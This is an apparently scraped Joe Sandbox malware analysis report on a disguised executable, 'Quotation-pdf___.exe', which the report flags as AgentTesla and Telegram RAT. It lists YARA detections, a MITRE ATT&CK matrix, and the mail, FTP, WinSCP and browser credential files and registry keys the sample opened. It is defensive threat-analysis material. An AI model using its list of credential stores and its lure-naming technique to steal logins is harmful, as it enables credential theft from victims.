Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation-pdf______________________________________.exe PID: 5224, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quotation-pdf______________________________________.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation-pdf______________________________________.exe.3e9ccc0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quotation-pdf______________________________________.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Quotation-pdf______________________________________.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation-pdf______________________________________.exe.3f14d00.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quotation-pdf______________________________________.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quotation-pdf______________________________________.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation-pdf______________________________________.exe.3f14d00.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quotation-pdf______________________________________.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.277057232.0000000003F14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.493572758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.276657553.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.272600476.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.273276153.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.273651203.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.272994936.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.276792797.0000000003E85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation-pdf______________________________________.exe PID: 4400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Quotation-pdf______________________________________.exe PID: 5224, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Source: Yara match	File source: 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation-pdf______________________________________.exe PID: 5224, type: MEMORYSTR

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation-pdf______________________________________.exe PID: 5224, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quotation-pdf______________________________________.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation-pdf______________________________________.exe.3e9ccc0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quotation-pdf______________________________________.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Quotation-pdf______________________________________.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation-pdf______________________________________.exe.3f14d00.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quotation-pdf______________________________________.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quotation-pdf______________________________________.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation-pdf______________________________________.exe.3f14d00.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Quotation-pdf______________________________________.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.277057232.0000000003F14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.493572758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.276657553.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.272600476.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.273276153.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.273651203.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.272994936.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.276792797.0000000003E85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation-pdf______________________________________.exe PID: 4400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Quotation-pdf______________________________________.exe PID: 5224, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	Path Interception	111 Process Injection	1 Masquerading	2 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Web Service	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	1 Input Capture	1 Process Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	131 Virtualization/Sandbox Evasion	1 Credentials in Registry	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	11 Archive Collected Data	Automated Exfiltration	1 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	2 Data from Local System	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	4 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Obfuscated Files or Information	Cached Domain Credentials	114 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Software Packing	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Quotation-pdf______________________________________.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Quotation-pdf______________________________________.exe